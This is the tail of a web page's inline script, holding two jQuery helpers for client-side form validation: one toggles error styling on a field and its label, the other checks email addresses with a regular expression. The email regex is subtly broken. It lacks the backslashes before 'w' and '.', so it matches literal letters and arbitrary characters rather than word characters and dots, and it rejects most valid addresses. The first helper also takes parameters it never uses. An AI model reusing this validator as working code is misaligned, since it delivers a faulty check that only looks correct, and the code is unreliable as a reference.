    function check_valid(me, valid, isdisplay, msg) {
        if (valid == "false") {
            let fore = "[for=" + $(me)[0].id + "]";
            $(me).addClass("clientSideError");
            $(fore).addClass("error");
        } else {
            let fore = "[for=" + me.id + "]";
            $(me).removeClass("clientSideError");
            $(fore).removeClass("error");
        }
    }

    function validateEmail(mail) {
        if (/^w+([.-]?w+)*@w+([.-]?w+)*(.w{2,11})+$/.test(mail)) {
            return true;
        }
        return false;
    }
</script>
</body>
</html>